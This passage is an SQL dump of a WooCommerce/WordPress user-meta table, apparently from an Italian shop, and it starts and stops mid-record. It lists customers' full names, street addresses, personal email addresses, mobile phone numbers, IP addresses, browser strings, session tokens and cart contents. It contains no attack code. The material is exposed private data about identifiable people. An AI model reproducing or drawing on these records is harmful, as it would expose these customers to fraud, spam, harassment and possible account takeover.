Safari/604.1\";s:5:\"login\";i:1522323047;}}'),(717,29,'last_update','1522323047'),(718,29,'billing_first_name','Giorgia'),(719,29,'billing_last_name','Merighi'),(720,29,'billing_email','MerighiGiorgia@gmail.com'),(721,29,'billing_phone','3476992944'),(722,29,'shipping_method',''),(723,29,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(724,30,'nickname','simonesanticcioli'),(725,30,'first_name','SANTICCIOLI'),(726,30,'last_name','SANTICCIOLI'),(727,30,'description',''),(728,30,'rich_editing','true'),(729,30,'syntax_highlighting','true'),(730,30,'comment_shortcuts','false'),(731,30,'admin_color','fresh'),(732,30,'use_ssl','0'),(733,30,'show_admin_bar_front','true'),(734,30,'locale',''),(735,30,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(736,30,'wp_user_level','0'),(737,30,'_yoast_wpseo_profile_updated','1522421417'),(738,30,'session_tokens','a:1:{s:64:\"14f6fada972bf0253c6e2dfde68d678c67d7fdf571734da3211ff860b265e581\";a:4:{s:10:\"expiration\";i:1523631017;s:2:\"ip\";s:13:\"79.16.195.215\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\";s:5:\"login\";i:1522421417;}}'),(740,30,'last_update','1522421417'),(741,30,'billing_first_name','SANTICCIOLI'),(742,30,'billing_last_name','SANTICCIOLI'),(743,30,'billing_address_1','RIGUTINO'),(744,30,'billing_city','AREZZO'),(745,30,'billing_email','simonesanticcioli@gmail.com'),(746,30,'billing_phone','3356385806'),(747,30,'shipping_method',''),(748,30,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(749,31,'nickname','Santaharizaj'),(750,31,'first_name','Santa'),(751,31,'last_name','Harizaj'),(752,31,'description',''),(753,31,'rich_editing','true'),(754,31,'syntax_highlighting','true'),(755,31,'comment_shortcuts','false'),(756,31,'admin_color','fresh'),(757,31,'use_ssl','0'),(758,31,'show_admin_bar_front','true'),(759,31,'locale',''),(760,31,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(761,31,'wp_user_level','0'),(762,31,'_yoast_wpseo_profile_updated','1522433444'),(763,31,'session_tokens','a:1:{s:64:\"060773c0e1086b91ca15d3c9455fa8267809dc4bc99c505c2004f8c9eecc18fa\";a:4:{s:10:\"expiration\";i:1523643045;s:2:\"ip\";s:14:\"188.218.94.114\";s:2:\"ua\";s:136:\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_6 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D100 Safari/604.1\";s:5:\"login\";i:1522433445;}}'),(764,31,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"6faa8040da20ef399b63a72d0e4ab575\";a:10:{s:3:\"key\";s:32:\"6faa8040da20ef399b63a72d0e4ab575\";s:10:\"product_id\";i:329;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:100;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:100;s:8:\"line_tax\";i:0;}}}'),(765,31,'last_update','1522433445'),(766,31,'billing_first_name','Santa'),(767,31,'billing_last_name','Harizaj'),(768,31,'billing_address_1','Via Altaseta 2'),(769,31,'billing_city','Bologna'),(770,31,'billing_email','Santaharizaj@gmail.com'),(771,31,'billing_phone','3428037160'),(772,31,'shipping_method',''),(773,32,'nickname','marty.mel86'),(774,32,'first_name','Martina'),(775,32,'last_name','Melucci'),(776,32,'description',''),(777,32,'rich_editing','true'),(778,32,'syntax_highlighting','true'),(779,32,'comment_shortcuts','false'),(780,32,'admin_color','fresh'),(781,32,'use_ssl','0'),(782,32,'show_admin_bar_front','true'),(783,32,'locale',''),(784,32,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(785,32,'wp_user_level','0'),(786,32,'_yoast_wpseo_profile_updated','1526970490'),(787,32,'session_tokens','a:2:{s:64:\"561db37ce00c1cd605db11a5972ad6191c9e3b40da5810a9cfdb1e762da6ef7c\";a:4:{s:10:\"expiration\";i:1528180090;s:2:\"ip\";s:14:\"37.117.114.145\";s:2:\"ua\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36\";s:5:\"login\";i:1526970490;}s:64:\"a5b43b23aeea8fd187933e1f74fe0cf6d0f31bfd388ed1a21bdff047d511b0ba\";a:4:{s:10:\"expiration\";i:1528180558;s:2:\"ip\";s:14:\"37.117.114.145\";s:2:\"ua\";s:135:\"Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1\";s:5:\"login\";i:1526970958;}}'),(789,32,'last_update','1526970490'),(790,32,'billing_first_name','Martina'),(791,32,'billing_last_name','Melucci'),(792,32,'billing_address_1','Via Antonio Bondi 61/4'),(793,32,'billing_city','Bologna'),(794,32,'billing_email','marty.mel86@gmail.com'),(795,32,'billing_phone','3204961791'),(796,32,'shipping_method',''),(797,32,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(798,1,'wc_last_active','1612051200'),(799,2,'wc_last_active','1603929600'),(800,3,'wc_last_active','1527206400'),(801,4,'wc_last_active','1527206400'),(802,5,'wc_last_active','1527206400'),(803,6,'wc_last_active','1527206400'),(804,7,'wc_last_active','1550016000'),(805,8,'wc_last_active','1527206400'),(806,9,'wc_last_active','1527206400'),(807,10,'wc_last_active','1527206400'),(808,11,'wc_last_active','1527206400'),(809,12,'wc_last_active','1527206400'),(810,13,'wc_last_active','1527206400'),(811,14,'wc_last_active','1527206400'),(812,15,'wc_last_active','1527206400'),(813,16,'wc_last_active','1527206400'),(814,17,'wc_last_active','1527206400'),(815,18,'wc_last_active','1527206400'),(816,19,'wc_last_active','1527206400'),(817,20,'wc_last_active','1527206400'),(818,21,'wc_last_active','1527206400'),(819,22,'wc_last_active','1527206400'),(820,23,'wc_last_active','1554508800'),(821,24,'wc_last_active','1527206400'),(822,25,'wc_last_active','1527206400'),(823,26,'wc_last_active','1527206400'),(824,27,'wc_last_active','1527206400'),(825,28,'wc_last_active','1527206400'),(826,29,'wc_last_active','1527206400'),(827,30,'wc_last_active','1527206400'),(828,31,'wc_last_active','1527206400'),(829,32,'wc_last_active','1527724800'),(830,33,'nickname','elisa_semprucci'),(831,33,'first_name','ROBERTO'),(832,33,'last_name','AULICO'),(833,33,'description',''),(834,33,'rich_editing','true'),(835,33,'syntax_highlighting','true'),(836,33,'comment_shortcuts','false'),(837,33,'admin_color','fresh'),(838,33,'use_ssl','0'),(839,33,'show_admin_bar_front','true'),(840,33,'locale',''),(841,33,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(842,33,'wp_user_level','0'),(843,33,'_yoast_wpseo_profile_updated','1531580742'),(844,33,'session_tokens','a:1:{s:64:\"abd955a61e8589829a382e4cb6ecba4b0aa08ede687b49b76cd3a5f886f19521\";a:4:{s:10:\"expiration\";i:1532790342;s:2:\"ip\";s:11:\"93.41.36.38\";s:2:\"ua\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/537.86.6\";s:5:\"login\";i:1531580742;}}'),(846,33,'last_update','1531580998'),(847,33,'billing_first_name','ROBERTO'),(848,33,'billing_last_name','AULICO'),(849,33,'billing_address_1','via luca della robbia 10/1'),(850,33,'billing_city','pesaro'),(851,33,'billing_email','elisa_semprucci@yahoo.it'),(852,33,'billing_phone','3493282505'),(853,33,'shipping_method',''),(854,33,'wc_last_active','1531526400'),(855,33,'paying_customer','1'),(856,33,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(857,34,'nickname','liquim'),(858,34,'first_name','Rossana'),(859,34,'last_name','Marconi'),(860,34,'description',''),(861,34,'rich_editing','true'),(862,34,'syntax_highlighting','true'),(863,34,'comment_shortcuts','false'),(864,34,'admin_color','fresh'),(865,34,'use_ssl','0'),(866,34,'show_admin_bar_front','true'),(867,34,'locale',''),(868,34,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(869,34,'wp_user_level','0'),(870,34,'_yoast_wpseo_profile_updated','1531931751'),(871,34,'session_tokens','a:1:{s:64:\"ec9d6f8739865441679f4f5565748e07ad07c55acc310c76a16f9d67584eec9f\";a:4:{s:10:\"expiration\";i:1533141351;s:2:\"ip\";s:12:\"2.235.69.213\";s:2:\"ua\";s:101:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\";s:5:\"login\";i:1531931751;}}'),(873,34,'last_update','1532355537'),(874,34,'billing_first_name','Rossana'),(875,34,'billing_last_name','Marconi'),(876,34,'billing_address_1','via Cadibona, 9'),(877,34,'billing_city','Milano'),(878,34,'billing_email','liquim@libero.it'),(879,34,'billing_phone','3401878666'),(881,34,'wc_last_active','1532304000'),(883,34,'shipping_method',''),(884,34,'paying_customer','1'),(885,34,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(886,1,'closedpostboxes_shop_order','a:0:{}'),(887,1,'metaboxhidden_shop_order','a:0:{}'),(894,1,'dismissed_update_notice','1'),(926,1,'syntax_highlighting','true'),(927,1,'locale',''),(928,1,'last_update','1603108007'),(929,1,'billing_first_name','Franco'),(930,1,'billing_last_name','Baldisserri'),(931,1,'billing_email','webmaster@baldisserri.com'),(932,1,'billing_phone','3286193589'),(933,1,'shipping_method',''),(934,1,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"eee55cc631acd3d569bdb0919c6d5efe\";a:7:{s:12:\"product_meta\";a:1:{s:9:\"meta_data\";a:7:{s:24:\"mwb_wgm_to_name_optional\";s:6:\"franco\";s:16:\"mwb_wgm_to_email\";s:25:\"webmaster@baldisserri.com\";s:17:\"mwb_wgm_from_name\";s:6:\"FRANCO\";s:15:\"mwb_wgm_message\";s:5:\"PROVA\";s:15:\"delivery_method\";s:17:\"Mail to recipient\";s:13:\"mwb_wgm_price\";s:3:\"100\";s:21:\"mwb_wgm_selected_temp\";s:3:\"468\";}}s:3:\"key\";s:32:\"eee55cc631acd3d569bdb0919c6d5efe\";s:10:\"product_id\";i:435;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b79ba8791f445b078b67e850e44d8677\";}}}'),(936,35,'nickname','lorenzo.prandini'),(937,35,'first_name','Lorenzo'),(938,35,'last_name','Prandini'),(939,35,'description',''),(940,35,'rich_editing','true'),(941,35,'syntax_highlighting','true'),(942,35,'comment_shortcuts','false'),(943,35,'admin_color','fresh'),(944,35,'use_ssl','0'),(945,35,'show_admin_bar_front','true'),(946,35,'locale',''),(947,35,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(948,35,'wp_user_level','0'),(949,35,'dismissed_wp_pointers','wp496_privacy'),(950,35,'_yoast_wpseo_profile_updated','1545906751'),(951,35,'session_tokens','a:1:{s:64:\"77c46063b4c4ea3bf39fed2da7ee7dc1457fb969f8d4816d8a5ee176183a297d\";a:4:{s:10:\"expiration\";i:1547116351;s:2:\"ip\";s:12:\"5.88.176.155\";s:2:\"ua\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:5:\"login\";i:1545906751;}}'),(953,35,'last_update','1545907159'),(954,35,'billing_first_name','Lorenzo'),(955,35,'billing_last_name','Prandini'),(956,35,'billing_address_1','Via N.Sauro 21'),(957,35,'billing_city','Modena'),(958,35,'billing_email','lorenzo.prandini@virgilio.it'),(959,35,'billing_phone','3386896613'),(960,35,'shipping_method',''),(961,35,'wc_last_active','1545868800'),(962,35,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"dd5f93300ad09ddfedccc145594455a3\";a:12:{s:12:\"product_meta\";a:1:{s:9:\"meta_data\";a:5:{s:16:\"mwb_wgm_to_email\";s:28:\"lorenzo.prandini@virgilio.it\";s:17:\"mwb_wgm_from_name\";s:7:\"Lorenzo\";s:15:\"mwb_wgm_message\";s:28:\"Un grosso abbraccio. Lorenzo\";s:15:\"delivery_method\";s:12:\"Downloadable\";s:13:\"mwb_wgm_price\";s:3:\"100\";}}s:3:\"key\";s:32:\"dd5f93300ad09ddfedccc145594455a3\";s:10:\"product_id\";i:548;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b79ba8791f445b078b67e850e44d8677\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:100;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:100;s:8:\"line_tax\";i:0;}}}'),(967,36,'nickname','abattis'),(968,36,'first_name','angelo'),(969,36,'last_name','battistini'),(970,36,'description',''),(971,36,'rich_editing','true'),(972,36,'syntax_highlighting','true'),(973,36,'comment_shortcuts','false'),(974,36,'admin_color','fresh'),(975,36,'use_ssl','0'),(976,36,'show_admin_bar_front','true'),(977,36,'locale',''),(978,36,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(979,36,'wp_user_level','0'),(980,36,'dismissed_wp_pointers','wp496_privacy'),(981,36,'_yoast_wpseo_profile_updated','1549044139'),(982,36,'session_tokens','a:1:{s:64:\"7828a3f8d9bb85c97f9d26409dfec83361b228441c8e525a282510e387e04139\";a:4:{s:10:\"expiration\";i:1550253739;s:2:\"ip\";s:13:\"151.42.50.109\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:5:\"login\";i:1549044139;}}'),(983,36,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"48aedb8880cab8c45637abc7493ecddd\";a:11:{s:3:\"key\";s:32:\"48aedb8880cab8c45637abc7493ecddd\";s:10:\"product_id\";i:288;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:30;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:30;s:8:\"line_tax\";i:0;}}}'),(984,36,'last_update','1549044139'),(985,36,'billing_first_name','angelo'),(986,36,'billing_last_name','battistini'),(987,36,'billing_address_1','via bastioni orientali 70'),(988,36,'billing_city','rimini'),(989,36,'billing_email','abattis@libero.it'),(990,36,'billing_phone','335340962'),(991,36,'shipping_method',''),(992,36,'wc_last_active','1548979200'),(993,37,'nickname','lucasemprini23'),(994,37,'first_name','Luca'),(995,37,'last_name','Semprini'),(996,37,'description',''),(997,37,'rich_editing','true'),(998,37,'syntax_highlighting','true'),(999,37,'comment_shortcuts','false'),(1000,37,'admin_color','fresh'),(1001,37,'use_ssl','0'),(1002,37,'show_admin_bar_front','true'),(1003,37,'locale',''),(1004,37,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1005,37,'wp_user_level','0'),(1006,37,'dismissed_wp_pointers','wp496_privacy'),(1007,37,'_yoast_wpseo_profile_updated','1549089042'),(1008,37,'session_tokens','a:1:{s:64:\"9f702f98fc37613e776d6f75d7c407f656d3f0458548499ab4d84649788174b1\";a:4:{s:10:\"expiration\";i:1550298642;s:2:\"ip\";s:14:\"95.248.165.229\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:5:\"login\";i:1549089042;}}'),(1010,37,'last_update','1549089042'),(1011,37,'billing_first_name','Luca'),(1012,37,'billing_last_name','Semprini'),(1013,37,'billing_address_1','Via Sant\'Andrea, 12'),(1014,37,'billing_city','Montescudo'),(1015,37,'billing_email','lucasemprini23@gmail.com'),(1016,37,'billing_phone','3493660385'),(1017,37,'shipping_method',''),(1018,37,'wc_last_active','1549065600'),(1019,37,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1020,38,'nickname','Nicola.zolikm'),(1021,38,'first_name','Nicola'),(1022,38,'last_name','Zoli'),(1023,38,'description',''),(1024,38,'rich_editing','true'),(1025,38,'syntax_highlighting','true'),(1026,38,'comment_shortcuts','false'),(1027,38,'admin_color','fresh'),(1028,38,'use_ssl','0'),(1029,38,'show_admin_bar_front','true'),(1030,38,'locale',''),(1031,38,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1032,38,'wp_user_level','0'),(1033,38,'dismissed_wp_pointers','wp496_privacy'),(1034,38,'_yoast_wpseo_profile_updated','1549106885'),(1035,38,'session_tokens','a:2:{s:64:\"553e1192105dde7047b82d8aa4b5c0e86aaa8f1dc29fb2e8fb14ec5653f4476f\";a:4:{s:10:\"expiration\";i:1550316486;s:2:\"ip\";s:13:\"93.40.215.105\";s:2:\"ua\";s:187:\"Mozilla/5.0 (Linux; Android 8.0.0; SM-G935F Build/R16NW; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/72.0.3626.76 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/206.0.0.36.105;]\";s:5:\"login\";i:1549106886;}s:64:\"471035da203d173a96aa32876d4ee92b466f667654521f4a0b9c4ae760a55ea3\";a:4:{s:10:\"expiration\";i:1549445604;s:2:\"ip\";s:13:\"79.43.243.202\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:5:\"login\";i:1549272804;}}'),(1037,38,'last_update','1549272867'),(1038,38,'billing_first_name','Nicola'),(1039,38,'billing_last_name','Zoli'),(1040,38,'billing_address_1','Via Torino campani 20 int 5'),(1041,38,'billing_city','Forli'),(1042,38,'billing_email','Nicola.zolikm@gmail.com'),(1043,38,'billing_phone','3453859744'),(1044,38,'shipping_method',''),(1045,38,'wc_last_active','1549238400'),(1047,38,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1048,39,'nickname','fedytordi'),(1049,39,'first_name','Federico'),(1050,39,'last_name','Tordi'),(1051,39,'description',''),(1052,39,'rich_editing','true'),(1053,39,'syntax_highlighting','true'),(1054,39,'comment_shortcuts','false'),(1055,39,'admin_color','fresh'),(1056,39,'use_ssl','0'),(1057,39,'show_admin_bar_front','true'),(1058,39,'locale',''),(1059,39,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1060,39,'wp_user_level','0'),(1061,39,'dismissed_wp_pointers','wp496_privacy'),(1062,39,'_yoast_wpseo_profile_updated','1549634382'),(1063,39,'session_tokens','a:1:{s:64:\"a7fa1920db4ef973c80bf4c0d102063de3c8bbea3e0b593bf7f2e9aaf1ea0373\";a:4:{s:10:\"expiration\";i:1550843982;s:2:\"ip\";s:12:\"95.252.185.1\";s:2:\"ua\";s:164:\"Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-N950F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/8.2 Chrome/63.0.3239.111 Mobile Safari/537.36\";s:5:\"login\";i:1549634382;}}'),(1065,39,'last_update','1549634382'),(1066,39,'billing_first_name','Federico'),(1067,39,'billing_last_name','Tordi'),(1068,39,'billing_email','fedytordi@gmail.com'),(1069,39,'billing_phone','3334259527'),(1070,39,'shipping_method',''),(1071,39,'wc_last_active','1549756800'),(1072,39,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"f90f2aca5c640289d0a29417bcb63a37\";a:11:{s:3:\"key\";s:32:\"f90f2aca5c640289d0a29417bcb63a37\";s:10:\"product_id\";i:290;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:60;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:60;s:8:\"line_tax\";i:0;}}}'),(1074,40,'nickname','christopherandruccioli54'),(1075,40,'first_name','Christopher'),(1076,40,'last_name','Andruccioli'),(1077,40,'description',''),(1078,40,'rich_editing','true'),(1079,40,'syntax_highlighting','true'),(1080,40,'comment_shortcuts','false'),(1081,40,'admin_color','fresh'),(1082,40,'use_ssl','0'),(1083,40,'show_admin_bar_front','true'),(1084,40,'locale',''),(1085,40,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1086,40,'wp_user_level','0'),(1087,40,'dismissed_wp_pointers','wp496_privacy'),(1088,40,'_yoast_wpseo_profile_updated','1549836253'),(1089,40,'session_tokens','a:1:{s:64:\"09a2e3ea354d4fdac0ac1b636ad96bdf9979d447c9a252814f6af166ebfaa85f\";a:4:{s:10:\"expiration\";i:1551045854;s:2:\"ip\";s:14:\"151.42.211.102\";s:2:\"ua\";s:137:\"Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1\";s:5:\"login\";i:1549836254;}}'),(1091,40,'last_update','1549836254'),(1092,40,'billing_first_name','Christopher'),(1093,40,'billing_last_name','Andruccioli'),(1094,40,'billing_email','christopherandruccioli54@gmail.com'),(1095,40,'billing_phone','393661364569'),(1096,40,'shipping_method',''),(1097,40,'wc_last_active','1549756800'),(1098,40,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1099,41,'nickname','fausto.terenzi'),(1100,41,'first_name','FAUSTO'),(1101,41,'last_name','TERENZI'),(1102,41,'description',''),(1103,41,'rich_editing','true'),(1104,41,'syntax_highlighting','true'),(1105,41,'comment_shortcuts','false'),(1106,41,'admin_color','fresh'),(1107,41,'use_ssl','0'),(1108,41,'show_admin_bar_front','true'),(1109,41,'locale',''),(1110,41,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1111,41,'wp_user_level','0'),(1112,41,'dismissed_wp_pointers','wp496_privacy'),(1113,41,'_yoast_wpseo_profile_updated','1549878028'),(1114,41,'session_tokens','a:1:{s:64:\"a8a0ce934dc3e9dec02ad97d8272f9b147125b1557e641ad5b22df566d429e06\";a:4:{s:10:\"expiration\";i:1551087628;s:2:\"ip\";s:12:\"77.93.248.29\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1549878028;}}'),(1116,41,'last_update','1549878028'),(1117,41,'billing_first_name','FAUSTO'),(1118,41,'billing_last_name','TERENZI'),(1119,41,'billing_address_1','VIA MINCIO 9'),(1120,41,'billing_city','MORCIANO DI ROMAGNA'),(1121,41,'billing_email','fausto.terenzi@tiscali.it'),(1122,41,'billing_phone','3356453471'),(1123,41,'shipping_method',''),(1124,41,'wc_last_active','1549843200'),(1125,41,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1126,42,'nickname','him_85'),(1127,42,'first_name','Tetyana'),(1128,42,'last_name','Melnyk'),(1129,42,'description',''),(1130,42,'rich_editing','true'),(1131,42,'syntax_highlighting','true'),(1132,42,'comment_shortcuts','false'),(1133,42,'admin_color','fresh'),(1134,42,'use_ssl','0'),(1135,42,'show_admin_bar_front','true'),(1136,42,'locale',''),(1137,42,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1138,42,'wp_user_level','0'),(1139,42,'dismissed_wp_pointers','wp496_privacy'),(1140,42,'_yoast_wpseo_profile_updated','1549882244'),(1141,42,'session_tokens','a:1:{s:64:\"b59ad27dc82a4c0b62d94c45805b35f2cdc351ffa90d77f087c56ad0ec9252c0\";a:4:{s:10:\"expiration\";i:1551091845;s:2:\"ip\";s:12:\"91.252.109.2\";s:2:\"ua\";s:123:\"Mozilla/5.0 (Linux; Android 8.0.0; PRA-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.64 Mobile Safari/537.36\";s:5:\"login\";i:1549882245;}}'),(1142,42,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"48aedb8880cab8c45637abc7493ecddd\";a:11:{s:3:\"key\";s:32:\"48aedb8880cab8c45637abc7493ecddd\";s:10:\"product_id\";i:288;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:30;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:30;s:8:\"line_tax\";i:0;}}}'),(1143,42,'last_update','1549882245'),(1144,42,'billing_first_name','Tetyana'),(1145,42,'billing_last_name','Melnyk'),(1146,42,'billing_city','Carpegna'),(1147,42,'billing_email','him_85@inbox.ru'),(1148,42,'billing_phone','3388769579'),(1149,42,'shipping_method',''),(1150,42,'wc_last_active','1549843200'),(1152,2,'wp_user-settings','editor=tinymce&post_dfw=on&libraryContent=browse'),(1153,2,'wp_user-settings-time','1603572814'),(1154,43,'nickname','alex_93_5300'),(1155,43,'first_name','Alex'),(1156,43,'last_name','Ronchi'),(1157,43,'description',''),(1158,43,'rich_editing','true'),(1159,43,'syntax_highlighting','true'),(1160,43,'comment_shortcuts','false'),(1161,43,'admin_color','fresh'),(1162,43,'use_ssl','0'),(1163,43,'show_admin_bar_front','true'),(1164,43,'locale',''),(1165,43,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1166,43,'wp_user_level','0'),(1167,43,'dismissed_wp_pointers','wp496_privacy'),(1168,43,'_yoast_wpseo_profile_updated','1549977497'),(1169,43,'session_tokens','a:1:{s:64:\"f3a8a7e7cae145154b38e17bd1ba659a3b899027d57819a92e7747b3b12c2be2\";a:4:{s:10:\"expiration\";i:1582215679;s:2:\"ip\";s:12:\"62.220.84.44\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\";s:5:\"login\";i:1581006079;}}'),(1171,43,'last_update','1581006163'),(1172,43,'billing_first_name','Alex'),(1173,43,'billing_last_name','Ronchi'),(1174,43,'billing_address_1','Via Riva del Garda, 15'),(1175,43,'billing_city','Riccione'),(1176,43,'billing_email','alex_93_5300@hotmail.it'),(1177,43,'billing_phone','3392914713'),(1178,43,'shipping_method',''),(1179,43,'wc_last_active','1580947200'),(1181,44,'nickname','Pietro.Fattori'),(1182,44,'first_name','Pietro'),(1183,44,'last_name','Fattori'),(1184,44,'description',''),(1185,44,'rich_editing','true'),(1186,44,'syntax_highlighting','true'),(1187,44,'comment_shortcuts','false'),(1188,44,'admin_color','fresh'),(1189,44,'use_ssl','0'),(1190,44,'show_admin_bar_front','true'),(1191,44,'locale',''),(1192,44,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1193,44,'wp_user_level','0'),(1194,44,'dismissed_wp_pointers','wp496_privacy'),(1195,44,'_yoast_wpseo_profile_updated','1549995345'),(1196,44,'session_tokens','a:1:{s:64:\"ce14a5be9e4ddb48719ef74c164924018a26736ee6ccc0a0a23965797db7bccd\";a:4:{s:10:\"expiration\";i:1551204945;s:2:\"ip\";s:14:\"109.235.104.11\";s:2:\"ua\";s:119:\"Mozilla/5.0 (Linux; Android 9; LYA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36\";s:5:\"login\";i:1549995345;}}'),(1198,44,'last_update','1549995345'),(1199,44,'billing_first_name','Pietro'),(1200,44,'billing_last_name','Fattori'),(1201,44,'billing_address_1','Contrada di Borgoloto 11'),(1202,44,'billing_city','San Marino'),(1203,44,'billing_email','Pietro.Fattori@hotmail.it'),(1204,44,'billing_phone','3893465675'),(1205,44,'shipping_method',''),(1206,44,'wc_last_active','1550016000'),(1207,44,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1208,45,'nickname','Denn7401'),(1209,45,'first_name','Dino'),(1210,45,'last_name','Cedalo'),(1211,45,'description',''),(1212,45,'rich_editing','true'),(1213,45,'syntax_highlighting','true'),(1214,45,'comment_shortcuts','false'),(1215,45,'admin_color','fresh'),(1216,45,'use_ssl','0'),(1217,45,'show_admin_bar_front','true'),(1218,45,'locale',''),(1219,45,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1220,45,'wp_user_level','0'),(1221,45,'dismissed_wp_pointers','wp496_privacy'),(1222,45,'_yoast_wpseo_profile_updated','1549996560'),(1223,45,'session_tokens','a:1:{s:64:\"1a77afcd7eafd79d58d02db0b30598b4c319d164fff127151d767762fcd72ce7\";a:4:{s:10:\"expiration\";i:1551206160;s:2:\"ip\";s:13:\"31.193.35.185\";s:2:\"ua\";s:137:\"Mozilla/5.0 